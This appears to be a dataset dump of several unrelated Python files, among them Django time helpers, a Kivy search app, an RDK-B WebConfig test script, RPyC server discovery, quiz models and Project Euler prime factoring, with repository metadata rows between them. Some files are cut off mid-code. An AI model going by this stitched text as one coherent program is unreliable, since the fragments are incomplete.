tzinfo = pytz.UTC
return datetime.datetime(*date.timetuple()[:6], tzinfo=tzinfo)
def extract_date_or_datetime(dt):
if isinstance(dt, datetime.datetime):
return convert_dt_to_aware(dt)
return dt
def convert_dt_to_aware(dt):
if not isinstance(dt, datetime.datetime):
dt = date_to_datetime(dt)
if not is_aware(dt):
# we don't want to use get_current_timezone() because
# settings.TIME_ZONE may be set something different than
# UTC in the future
return make_aware(dt, timezone=pytz.UTC)
return dt
def timedelta_nice_repr(timedelta, display='long', sep=', '):
"""
Turns a datetime.timedelta object into a nice string repr.
'display' can be 'minimal', 'short' or 'long' (default).
Taken from bitbucket.org/schinckel/django-timedelta-field.
'sql' and 'iso8601' support have been removed.
"""
if not isinstance(timedelta, datetime.timedelta):
raise TypeError('First argument must be a timedelta.')
result = []
weeks = int(timedelta.days / 7)
days = timedelta.days % 7
hours = int(timedelta.seconds / 3600)
minutes = int((timedelta.seconds % 3600) / 60)
seconds = timedelta.seconds % 60
if display == 'minimal':
words = ['w', 'd', 'h', 'm', 's']
elif display == 'short':
words = [' wks', ' days', ' hrs', ' min', ' sec']
elif display == 'long':
words = [' weeks', ' days', ' hours', ' minutes', ' seconds']
else:
# Use django template-style formatting.
# Valid values are d, g, G, h, H, i, s.
return re.sub(r'([dgGhHis])', lambda x: '%%(%s)s' % x.group(), display) % {
'd': days,
'g': hours,
'G': hours if hours > 9 else '0%s' % hours,
'h': hours,
'H': hours if hours > 9 else '0%s' % hours,
'i': minutes if minutes > 9 else '0%s' % minutes,
's': seconds if seconds > 9 else '0%s' % seconds
}
values = [weeks, days, hours, minutes, seconds]
for i in range(len(values)):
if values[i]:
if values[i] == 1 and len(words[i]) > 1:
result.append('%i%s' % (values[i], words[i].rstrip('s')))
else:
result.append('%i%s' % (values[i], words[i]))
# Values with less than one second, which are considered zeroes.
if len(result) == 0:
# Display as 0 of the smallest unit.
result.append('0%s' % (words[-1]))
return sep.join(result)
def timedelta_parse(string):
"""
Parse a string into a timedelta object.
Taken from bitbucket.org/schinckel/django-timedelta-field.
"""
string = string.strip()
if not string:
raise TypeError(f'{string!r} is not a valid time interval')
# This is the format we get from sometimes PostgreSQL, sqlite,
# and from serialization.
d = re.match(
r'^((?P<days>[-+]?\d+) days?,? )?(?P<sign>[-+]?)(?P<hours>\d+):'
r'(?P<minutes>\d+)(:(?P<seconds>\d+(\.\d+)?))?$',
string
)
if d:
d = d.groupdict(0)
if d['sign'] == '-':
for k in 'hours', 'minutes', 'seconds':
d[k] = '-' + d[k]
d.pop('sign', None)
else:
# This is the more flexible format.
d = re.match(
r'^((?P<weeks>-?((\d*\.\d+)|\d+))\W*w((ee)?(k(s)?)?)(,)?\W*)?'
r'((?P<days>-?((\d*\.\d+)|\d+))\W*d(ay(s)?)?(,)?\W*)?'
r'((?P<hours>-?((\d*\.\d+)|\d+))\W*h(ou)?(r(s)?)?(,)?\W*)?'
r'((?P<minutes>-?((\d*\.\d+)|\d+))\W*m(in(ute)?(s)?)?(,)?\W*)?'
r'((?P<seconds>-?((\d*\.\d+)|\d+))\W*s(ec(ond)?(s)?)?)?\W*$',
string
)
if not d:
raise TypeError(f'{string!r} is not a valid time interval')
d = d.groupdict(0)
return datetime.timedelta(**{k: float(v) for k, v in d.items()})
| 34.16
| 102
| 0.545902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,577
| 0.369321
|
0b59207603dace13de5bad24d570481b2383557b
| 4,282
|
py
|
Python
|
frontend/main.py
|
loukwn/klougle
|
45432841c594ced36437566f416e9c71017f83a5
|
[
"MIT"
] | 2
|
2018-10-26T11:06:51.000Z
|
2020-04-29T13:38:13.000Z
|
frontend/main.py
|
loukwn/klougle
|
45432841c594ced36437566f416e9c71017f83a5
|
[
"MIT"
] | null | null | null |
frontend/main.py
|
loukwn/klougle
|
45432841c594ced36437566f416e9c71017f83a5
|
[
"MIT"
] | null | null | null |
import json
import operator
import os
import webbrowser
from timeit import default_timer as timer
from kivy.app import App
from kivy.config import Config
from kivy.properties import ObjectProperty
from kivy.uix.stacklayout import StackLayout
from nltk.stem.wordnet import WordNetLemmatizer
Config.set('input', 'mouse', 'mouse,multitouch_on_demand')
INV_IDX_NAME = 'inv_index.json'
_wordnet_lemmatizer = WordNetLemmatizer()
_wordnet_lemmatizer.lemmatize('asd')
def get_data_from_json():
# loads the inverted index in memory
rel_path = "inv_index/" + INV_IDX_NAME
abs_file_path = os.path.join(os.pardir, rel_path)
with open(abs_file_path) as data_file:
return json.load(data_file)
def get_doc_details(key):
# uses the id of the document to find its location in disk and then returns its title and its link
temp = key.split('_')
partial_path = 'crawlers/crawled/' + temp[0] + '/' + temp[1] + '/' + temp[2] + '.json'
abs_file_path = os.path.join(os.pardir, partial_path)
with open(abs_file_path) as f:
j = json.load(f)
return [j['title'], j['link']]
def perform_query(query):
# we process the query (split/lemmatize/turn to lowercase)
terms = [_wordnet_lemmatizer.lemmatize(x.strip().lower()) for x in query.split()]
data = get_data_from_json()
# the dictionary that will hold the document results
docs_returned = {}
# we search for every term in the query the corresponing lemma in the inverted index
for lemma in data:
if lemma in terms:
# if we find the the term in the inverted index
for i in data[lemma]:
# we add its weight to the docs_returned structure
if i['id'] not in docs_returned:
docs_returned[i['id']] = i['w']
else:
docs_returned[i['id']] += i['w']
# we sort the docs based on their values (descending)
sorted_x = sorted(docs_returned.items(), key=operator.itemgetter(1), reverse=True)
to_return = []
count = 1
for key, value in sorted_x:
# and for every doc we extract the title and link so that we can show them
[title, link] = get_doc_details(key)
title = str(count) + ') ' + title
to_return.append([title, link, value])
count += 1
return to_return
# -------------------------- UI -------------------------- #
def open_url(text):
# click an item to open the link to the browser
webbrowser.open(text.split('\n')[0], new=2)
# top layout of UI
class SearchUI(StackLayout):
statusLabel = ObjectProperty()
resultList = ObjectProperty()
searchInput = ObjectProperty()
def add_result_to_list_view(self, title, link, weight):
resized_link = link
if len(resized_link) >= 102:
resized_link = resized_link[0:102] + '...'
content = link + '\n[size=16][b]' + title + '[/b][/size]\n-- [size=15][color=#757575][i]Weight: ' + str(
weight) + '[/i][/color]\n[color=#3F51B5]' + resized_link + '[/size][/color]'
self.resultList.adapter.data.extend([content])
self.resultList._trigger_reset_populate()
def go_pressed(self):
query = self.searchInput.text.strip()
if len(query) > 0:
self.clear_list()
self.statusLabel.text = "Searching.."
start = timer() #
results = perform_query(query) # query to inverted index happens (and is timed) here
end = timer() #
if len(results) > 0:
for doc in results:
self.add_result_to_list_view(doc[0], doc[1], doc[2])
self.statusLabel.text = "Results: " + str(
len(self.resultList.adapter.data)) + " (Time elapsed: " + "{:10.4f}s) ".format(end - start)
else:
self.statusLabel.text = "No results.."
else:
self.clear_list()
self.statusLabel.text = 'Type some search terms and hit "Go"'
def clear_list(self):
del self.resultList.adapter.data[:]
# kivy app
class SearchApp(App):
def build(self):
return SearchUI()
# starting point
if __name__ == '__main__':
SearchApp().run()
| 34.532258
| 115
| 0.609295
| 1,647
| 0.384633
| 0
| 0
| 0
| 0
| 0
| 0
| 1,149
| 0.268333
|
0b5a05b2b3ff689eda558db7efd7ba2b693f4a50
| 1,244
|
py
|
Python
|
test.py
|
richisusiljacob/VideoTo360VR
|
14c176cfbe90fd7cf113cbdd2d4edf447c001894
|
[
"MIT"
] | 5
|
2021-08-06T11:26:56.000Z
|
2022-03-17T09:06:07.000Z
|
test.py
|
richisusiljacob/VideoTo360VR
|
14c176cfbe90fd7cf113cbdd2d4edf447c001894
|
[
"MIT"
] | 8
|
2021-07-03T08:08:00.000Z
|
2021-07-09T06:59:34.000Z
|
test.py
|
richisusiljacob/VideoTo360VR
|
14c176cfbe90fd7cf113cbdd2d4edf447c001894
|
[
"MIT"
] | 2
|
2021-07-02T09:19:09.000Z
|
2021-07-04T13:34:30.000Z
|
from tkinter import *
import tkinter.ttk as ttk
from PIL import ImageTk,Image
""" root = Tk()
canvas = Canvas(root, width = 300, height = 300)
canvas.pack()
img = ImageTk.PhotoImage(Image.open("output/collage1/FinalCollage.jpg"))
canvas.create_image(0,0,anchor=NW, image=img)
root.mainloop() """
root = Tk()
root.title("Tab Widget")
tabControl = ttk.Notebook(root)
tab1 = ttk.Frame(tabControl)
tab2 = ttk.Frame(tabControl)
tabControl.add(tab1, text ='Tab 1')
tabControl.add(tab2, text ='Tab 2')
tabControl.pack(expand = 1, fill ="both")
ttk.Label(tab1,
text ="Welcome to \
GeeksForGeeks").grid(column = 0,
row = 0,
padx = 30,
pady = 30)
canvas = Canvas(tab1, width = 300, height = 300)
canvas.grid(column= 1, row =0)
img = ImageTk.PhotoImage(Image.open("output/collage1/FinalCollage.jpg"))
canvas.create_image(0,0,anchor=NW, image=img)
ttk.Label(tab2,
text ="Lets dive into the\
world of computers").grid(column = 0,
row = 0,
padx = 30,
pady = 30)
root.mainloop()
| 31.1
| 74
| 0.553859
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 381
| 0.30627
|
0b5a82c329031fc6f172ed423012d36ab20bca44
| 10,817
|
py
|
Python
|
testscripts/RDKB/component/WEBCONFIG/TS_WEBCONFIG_DisableRFC_QuerySyncParams.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
testscripts/RDKB/component/WEBCONFIG/TS_WEBCONFIG_DisableRFC_QuerySyncParams.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
testscripts/RDKB/component/WEBCONFIG/TS_WEBCONFIG_DisableRFC_QuerySyncParams.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2021 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version="1.0" encoding="UTF-8"?><xml>
<id/>
<version>1</version>
<name>TS_WEBCONFIG_DisableRFC_QuerySyncParams</name>
<primitive_test_id/>
<primitive_test_name>Webconfig_DoNothing</primitive_test_name>
<primitive_test_version>1</primitive_test_version>
<status>FREE</status>
<synopsis>To disable the Webconfig RFC and check if a get operation on Force Sync parameters logs DB failure in WebConfig.log file</synopsis>
<groups_id/>
<execution_time>10</execution_time>
<long_duration>false</long_duration>
<advanced_script>false</advanced_script>
<remarks/>
<skip>false</skip>
<box_types>
<box_type>Broadband</box_type>
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
</rdk_versions>
<test_cases>
<test_case_id>TC_WEBCONFIG_02</test_case_id>
<test_objective>This test is case is to disable the RFC and check if a get operation on Force Sync parameters logs DB failure in WebConfig.log file</test_objective>
<test_type>Positive</test_type>
<test_setup>Broadband</test_setup>
<pre_requisite>1.Ccsp Components in DUT should be in a running state that includes component under test Cable Modem
2.TDK Agent should be in running state or invoke it through StartTdk.sh script
3.Webconfig distro should be enabled else enable with custom image</pre_requisite>
<api_or_interface_used>pam_GetParameterValues
pam_SetParameterValues</api_or_interface_used>
<input_parameters>Device.X_RDK_WebConfig.RfcEnable
Device.X_RDK_WebConfig.ConfigFile.1.ForceSyncCheck
Device.X_RDK_WebConfig.ConfigFile.1.SyncCheckOK"</input_parameters>
<automation_approch>1.Load the module
2.Get the current webconfig RFC enable status and disable the RFC
3.Do a get operation on Force Sync check and Force Sync Check Ok parameters
4.Check if DB failed message specific to the parameter is logged in WebConfig.log File
5.Revert the RFC status to previous
6.Unload the module</automation_approch>
<expected_output>When webconfig RFC is disabled and get operation done on Force Sync parameters should log Db failed message specific to the parameter in webConfig.log file</expected_output>
<priority>High</priority>
<test_stub_interface>WEBCONFIG</test_stub_interface>
<test_script>TS_WEBCONFIG_DisableRFC_QuerySyncParams</test_script>
<skipped>No</skipped>
<release_version>M86</release_version>
<remarks>None</remarks>
</test_cases>
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
from tdkbVariables import *;
import tdkutility
from tdkutility import *
from time import sleep;
#Test component to be tested
sysobj = tdklib.TDKScriptingLibrary("sysutil","1");
pamobj = tdklib.TDKScriptingLibrary("pam","1");
#IP and Port of box, No need to change,
#This will be replaced with correspoing Box Ip and port while executing script
ip = <ipaddress>
port = <port>
pamobj.configureTestCase(ip,port,'TS_WEBCONFIG_DisableRFC_QuerySyncParams');
sysobj.configureTestCase(ip,port,'TS_WEBCONFIG_DisableRFC_QuerySyncParams');
#Get the result of connection with test component and DUT
pamloadmodulestatus =pamobj.getLoadModuleResult();
sysloadmodulestatus =sysobj.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %pamloadmodulestatus ;
print "[LIB LOAD STATUS] : %s" %sysloadmodulestatus ;
revert = 0;
if "SUCCESS" in pamloadmodulestatus.upper() and "SUCCESS" in sysloadmodulestatus.upper():
#Set the result status of execution
pamobj.setLoadModuleStatus("SUCCESS");
sysobj.setLoadModuleStatus("SUCCESS");
tdkTestObj = pamobj.createTestStep('pam_GetParameterValues');
tdkTestObj.addParameter("ParamName","Device.X_RDK_WebConfig.RfcEnable");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase("expectedresult");
actualresult = tdkTestObj.getResult();
initial_value = tdkTestObj.getResultDetails().strip();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1: Get current value of Web Config Enable"
print "EXPECTED RESULT 1: Should get current value of Web Config Enable"
print "ACTUAL RESULT 1: current value is %s" %initial_value;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = pamobj.createTestStep('pam_SetParameterValues');
tdkTestObj.addParameter("ParamName","Device.X_RDK_WebConfig.RfcEnable");
tdkTestObj.addParameter("ParamValue","false");
tdkTestObj.addParameter("Type","boolean");
expectedresult="SUCCESS";
#Execute testcase on DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
result = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
revert =1;
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Set Web Config Enable status to false";
print "EXPECTED RESULT 2: Should set Web Config Enable status to false";
print "ACTUAL RESULT 2: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
paramlist = ["Device.X_RDK_WebConfig.ConfigFile.1.ForceSyncCheck","Device.X_RDK_WebConfig.ConfigFile.1.SyncCheckOK"];
logMsgs = ["ForceSyncCheck GET from DB failed","SyncCheckOK GET from DB failed"];
i=0;
for item in paramlist:
tdkTestObj = pamobj.createTestStep('pam_GetParameterValues');
tdkTestObj.addParameter("ParamName",item);
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase("expectedresult");
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip();
if expectedresult in actualresult:
print "Querying %s parameter is sucessfull" %item;
print "Check if DB failed message is seen on querying this specific parameter";
sleep(5);
tdkTestObj = sysobj.createTestStep('ExecuteCmd');
expectedresult="SUCCESS";
cmd= "cat /rdklogs/logs/WebConfig.log | grep -rn \"%s\" " %logMsgs[i];
print cmd;
expectedresult="SUCCESS";
tdkTestObj.addParameter("command", cmd);
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
i= i+1;
if expectedresult in actualresult and details:
tdkTestObj.setResultStatus("SUCCESS");
print"%s" %details;
print"The expected log message is present when Queried";
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print "The expected log message is not present: %s" %logMsgs[i];
print "[TEST EXECUTION RESULT] : FAILURE";
break;
else:
revert =0;
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Set Web Config Enable status to false";
print "EXPECTED RESULT 2: Should set Web Config Enable status to false";
print "ACTUAL RESULT 2: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
if revert ==1 :
tdkTestObj = pamobj.createTestStep('pam_SetParameterValues');
tdkTestObj.addParameter("ParamName","Device.X_RDK_WebConfig.RfcEnable");
tdkTestObj.addParameter("ParamValue",initial_value);
tdkTestObj.addParameter("Type","boolean");
expectedresult="SUCCESS";
#Execute testcase on DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
result = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 3: Revert the Web Config Enable status to previous"
print "EXPECTED RESULT 3: Should revert Web Config status to previous"
print "ACTUAL RESULT 3: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 3: Revert Web Config Enable status to previous"
print "EXPECTED RESULT 3: Should revert Web Config Enable status to previous"
print "ACTUAL RESULT 3: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1: Get current value of Web Config Enable"
print "EXPECTED RESULT 1: Should get current value of Web Config Enable"
print "ACTUAL RESULT 1: current value is %s" %initial_value;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
pamobj.unloadModule("pam");
sysobj.unloadModule("sysutil");
else:
print "Failed to load pam/sysutil module";
pamobj.setLoadModuleStatus("FAILURE");
sysobj.setLoadModuleStatus("FAILURE");
print "Module loading failed";
| 49.168182
| 194
| 0.665249
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6,422
| 0.593695
|
0b5a9a6d564a0a48f6482c88a286d5b324351dbc
| 3,283
|
py
|
Python
|
xappt_qt/plugins/tools/examples/auto_advance.py
|
cmontesano/xappt_qt
|
74f8c62e0104a67b4b4eb65382df851221bf0bab
|
[
"MIT"
] | null | null | null |
xappt_qt/plugins/tools/examples/auto_advance.py
|
cmontesano/xappt_qt
|
74f8c62e0104a67b4b4eb65382df851221bf0bab
|
[
"MIT"
] | 12
|
2020-10-11T22:42:12.000Z
|
2021-10-04T19:38:51.000Z
|
xappt_qt/plugins/tools/examples/auto_advance.py
|
cmontesano/xappt_qt
|
74f8c62e0104a67b4b4eb65382df851221bf0bab
|
[
"MIT"
] | 1
|
2021-09-29T23:53:34.000Z
|
2021-09-29T23:53:34.000Z
|
import time
import xappt
@xappt.register_plugin
class AutoAdvance(xappt.BaseTool):
message = xappt.ParamString(options={"ui": "label"})
next_iteration_advance_mode = xappt.ParamInt(choices=("no auto advance", "auto advance"))
def __init__(self, *, interface: xappt.BaseInterface, **kwargs):
super(AutoAdvance, self).__init__(interface=interface, **kwargs)
self.max_iterations = 5
self.auto_advance = bool(self.interface.tool_data.get('next_iteration_advance_mode', 0))
self.iteration = self.interface.tool_data.get("iteration", 1)
if self.iteration == self.max_iterations:
step = "last"
self.next_iteration_advance_mode.hidden = True
else:
step = xappt.humanize_ordinal(self.iteration)
self.message.value = f"This is the {step} of {self.max_iterations} iterations of this tool."
@classmethod
def name(cls) -> str:
return 'auto-advance'
@classmethod
def help(cls) -> str:
return ("When using a tool in the Qt interface, the default behavior is to leave the tool disabled "
"after a successful execution. Clicking **Next** or **Close** will move to the next tool or "
"close the interface.\n\nYou can set an attribute named `auto_advance`, and when it's set "
"to `True` the next tool will be automatically loaded (or the interface wil be closed) after "
"a successful execution.")
def message_label_text(self) -> str:
raise NotImplementedError
@classmethod
def collection(cls) -> str:
return "Examples"
def execute(self, **kwargs) -> int:
self.interface.progress_start()
for i in range(100):
progress = (i + 1) / 100.0
self.interface.progress_update(f"Iteration: {i + 1}/100", progress)
time.sleep(0.01)
self.interface.progress_end()
last_iteration = self.iteration == self.max_iterations
if last_iteration:
if self.auto_advance:
self.interface.message("Auto Advance is enabled for this iteration.\n\nOnce you click OK "
"on this message the interface will automatically exit.")
else:
self.interface.message("Auto Advance is disabled for this iteration.\n\nOnce you click OK "
"on this message, click the Close button to exit this interface.")
else:
self.interface.add_tool(AutoAdvance)
if self.auto_advance:
self.interface.message("Auto Advance is enabled for this iteration.\n\nOnce you click OK "
"on this message the next iteration will be automatically loaded.")
else:
self.interface.message("Auto Advance is disabled for this iteration.\n\nOnce you click OK "
"on this message click the Next button to continue to the next "
"iteration.")
self.interface.tool_data['iteration'] = self.iteration + 1
self.interface.tool_data['next_iteration_advance_mode'] = self.next_iteration_advance_mode.value
return 0
| 43.773333
| 110
| 0.616205
| 3,231
| 0.984161
| 0
| 0
| 3,254
| 0.991167
| 0
| 0
| 1,176
| 0.358209
|
0b5adb9041b96e89affef15661e25d3114bd15aa
| 962
|
py
|
Python
|
play-1.2.4/python/Lib/site-packages/Rpyc/Utils/Discovery.py
|
AppSecAI-TEST/restcommander
|
a2523f31356938f5c7fc6d379b7678da0b1e077a
|
[
"Apache-2.0"
] | 550
|
2015-01-05T16:59:00.000Z
|
2022-03-20T16:55:25.000Z
|
framework/python/Lib/site-packages/Rpyc/Utils/Discovery.py
|
lafayette/JBTT
|
94bde9d90abbb274d29ecd82e632d43a4320876e
|
[
"MIT"
] | 15
|
2015-02-05T06:00:47.000Z
|
2018-07-07T14:34:04.000Z
|
framework/python/Lib/site-packages/Rpyc/Utils/Discovery.py
|
lafayette/JBTT
|
94bde9d90abbb274d29ecd82e632d43a4320876e
|
[
"MIT"
] | 119
|
2015-01-08T00:48:24.000Z
|
2022-01-27T14:13:15.000Z
|
"""
Discovery: broadcasts a query, attempting to discover all running RPyC servers
over the local network/specific subnet.
"""
import socket
import select
import struct
__all__ = ["discover_servers"]
UDP_DISCOVERY_PORT = 18813
QUERY_MAGIC = "RPYC_QUERY"
MAX_DGRAM_SIZE = 100
def discover_servers(subnet = "255.255.255.255", timeout = 1):
"""broadcasts a query and returns a list of (addr, port) of running servers"""
# broadcast
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.sendto(QUERY_MAGIC, (subnet, UDP_DISCOVERY_PORT))
# wait for replies
replies = []
while True:
rlist, dummy, dummy = select.select([s], [], [], timeout)
if not rlist:
break
data, (addr, port) = s.recvfrom(MAX_DGRAM_SIZE)
rpyc_port, = struct.unpack("<H", data)
replies.append((addr, rpyc_port))
return list(set(replies))
| 24.666667
| 82
| 0.672557
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 284
| 0.295218
|
0b5cea9d906ea2c35bda5ccee23fdca482e7e9b4
| 335
|
py
|
Python
|
atest/testresources/testlibs/objecttoreturn.py
|
userzimmermann/robotframework
|
7aa16338ce2120cb082605cf548c0794956ec901
|
[
"Apache-2.0"
] | 7
|
2015-02-25T10:55:02.000Z
|
2015-11-04T03:20:05.000Z
|
atest/testresources/testlibs/objecttoreturn.py
|
userzimmermann/robotframework
|
7aa16338ce2120cb082605cf548c0794956ec901
|
[
"Apache-2.0"
] | 12
|
2015-02-24T17:00:06.000Z
|
2015-07-31T08:32:07.000Z
|
atest/testresources/testlibs/objecttoreturn.py
|
userzimmermann/robotframework
|
7aa16338ce2120cb082605cf548c0794956ec901
|
[
"Apache-2.0"
] | 2
|
2015-12-15T11:00:35.000Z
|
2018-02-24T18:11:24.000Z
|
try:
import exceptions
except ImportError: # Python 3
import builtins as exceptions
class ObjectToReturn:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
def exception(self, name, msg=""):
exception = getattr(exceptions, name)
raise exception(msg)
| 19.705882
| 45
| 0.647761
| 241
| 0.719403
| 0
| 0
| 0
| 0
| 0
| 0
| 12
| 0.035821
|
0b5db17336f788ad1d51e0ebfedab480c4c72a7e
| 2,068
|
py
|
Python
|
quiz/models.py
|
jzi040941/django_quiz
|
465d29c74e3ff6814f686296d225f18a50c99b9a
|
[
"MIT"
] | 1
|
2018-03-14T16:43:00.000Z
|
2018-03-14T16:43:00.000Z
|
quiz/models.py
|
jzi040941/django_quiz
|
465d29c74e3ff6814f686296d225f18a50c99b9a
|
[
"MIT"
] | null | null | null |
quiz/models.py
|
jzi040941/django_quiz
|
465d29c74e3ff6814f686296d225f18a50c99b9a
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class quiz_short(models.Model):
AssignNum = models.ForeignKey('teacher.Assignment', on_delete=models.CASCADE)
Question = models.TextField()
Answer = models.TextField()
def __str__(self):
return "AssignNum : %s, question: %s Answer: %s" % (self.AssignNum, self.Question, self.Answer)
class quiz_one(models.Model):
AssignNum = models.ForeignKey('teacher.Assignment', on_delete=models.CASCADE)
Question = models.TextField()
# Check = models.CharField(max_length=7, choices=CHECK_LIST)
Check = models.IntegerField(null=True,blank=True)
'''
Check_1 = models.BooleanField()
Check_2 = models.BooleanField()
Check_3 = models.BooleanField()
Check_4 = models.BooleanField()
'''
Selection_1 = models.TextField()
Selection_2 = models.TextField()
Selection_3 = models.TextField()
Selection_4 = models.TextField()
def __str__(self):
return "AssignNum : %s, question: %s Selection_1: %s" % (self.AssignNum, self.Question, self.Selection_1)
'''
class quiz_one(models.Model):
AssignNum = models.ForeignKey('teacher.Assignment', on_delete=models.CASCADE)
Question = models.TextField()
Answer = models.TextField()
Wrong_1 = models.TextField()
Wrong_2 = models.TextField()
Wrong_3 = models.TextField()
def __str__(self):
return "AssignNum : %s, question: %s Answer: %s" % (self.AssignNum, self.Question, self.Answer)
'''
class quiz_multi(models.Model):
AssignNum = models.ForeignKey('teacher.Assignment', on_delete=models.CASCADE)
Question = models.TextField()
Check_1 = models.BooleanField()
Check_2 = models.BooleanField()
Check_3 = models.BooleanField()
Check_4 = models.BooleanField()
Selection_1 = models.TextField()
Selection_2 = models.TextField()
Selection_3 = models.TextField()
Selection_4 = models.TextField()
def __str__(self):
return "AssignNum : %s, question: %s Selection_1: %s" % (self.AssignNum, self.Question, self.Selection_1)
| 35.655172
| 113
| 0.696325
| 1,593
| 0.770309
| 0
| 0
| 0
| 0
| 0
| 0
| 848
| 0.410058
|
0b5e2ce14cd1b7d0c4bdab1dbcbd6268fb51f4f1
| 165
|
py
|
Python
|
benchmark/VAR/GG/common.py
|
victor-estrade/SystGradDescent
|
822e7094290301ec47a99433381a8d6406798aff
|
[
"MIT"
] | 2
|
2019-03-20T09:05:02.000Z
|
2019-03-20T15:23:44.000Z
|
benchmark/VAR/GG/common.py
|
victor-estrade/SystGradDescent
|
822e7094290301ec47a99433381a8d6406798aff
|
[
"MIT"
] | null | null | null |
benchmark/VAR/GG/common.py
|
victor-estrade/SystGradDescent
|
822e7094290301ec47a99433381a8d6406798aff
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from __future__ import unicode_literals
| 27.5
| 39
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 15
| 0.090909
|
0b610800704e8c840fbc0a2a516adbeed8570f93
| 3,479
|
py
|
Python
|
problems/problem3.py
|
JakobHavtorn/euler
|
b5ca0b4393dc9a6d6e0623e0df5b96f803e116ab
|
[
"MIT"
] | null | null | null |
problems/problem3.py
|
JakobHavtorn/euler
|
b5ca0b4393dc9a6d6e0623e0df5b96f803e116ab
|
[
"MIT"
] | null | null | null |
problems/problem3.py
|
JakobHavtorn/euler
|
b5ca0b4393dc9a6d6e0623e0df5b96f803e116ab
|
[
"MIT"
] | null | null | null |
"""Largest prime factor
The prime factors of 13195 are 5, 7, 13 and 29.
What is the largest prime factor of the number 600851475143?
"""
import math
import numpy as np
def largest_prime_factor_naive(number):
"""
Let the given number be n and let k = 2, 3, 4, 5, ... .
For each k, if it is a factor of n then we divide n by k and completely divide out each k before moving to the next k.
It can be seen that when k is a factor it will necessarily be prime, as all smaller factors have been removed,
and the final result of this process will be n = 1.
"""
factor = 2
factors = []
while number > 1:
if number % factor == 0:
factors.append(factor)
number = number // factor # Remainder guarenteed to be zero
while number % factor == 0:
number = number // factor # Remainder guarenteed to be zero
factor += 1
return factors
def largest_prime_factor_even_optimized(number):
"""
We know that, excluding 2, there are no even prime numbers.
So we can increase factor by 2 per iteration after having found the
"""
factors = []
factor = 2
if number % factor == 0:
number = number // factor
factors.append(factor)
while number % factor == 0:
number = number // factor
factor = 3
while number > 1:
if number % factor == 0:
factors.append(factor)
number = number // factor # Remainder guarenteed to be zero
while number % factor == 0:
number = number // factor # Remainder guarenteed to be zero
factor += 2
return factors
def largest_prime_factor_square_optimized(number):
"""
Every number n can at most have one prime factor greater than n.
If we, after dividing out some prime factor, calculate the square root of the remaining number
we can use that square root as upper limit for factor.
If factor exceeds this square root we know the remaining number is prime.
"""
factors = []
factor = 2
if number % factor == 0:
number = number // factor
factors.append(factor)
while number % factor == 0:
number = number // factor
factor = 3
max_factor = math.sqrt(number)
while number > 1 and factor <= max_factor:
if number % factor == 0:
factors.append(factor)
number = number // factor
while number % factor == 0:
number = number // factor
max_factor = math.sqrt(number)
factor += 2
return factors
def idx_sieve(length):
"""Static length sieve-based prime generator"""
primes = []
is_prime = np.array([True]*length)
i = 2
while i < length:
if is_prime[i]:
is_prime[np.arange(i, length, i)] = False
primes.append(i)
else:
i += 1
return primes
def prime_factor(n, primes):
i = 0
factors = []
while n != 1:
while (n % primes[i]) != 0:
i += 1
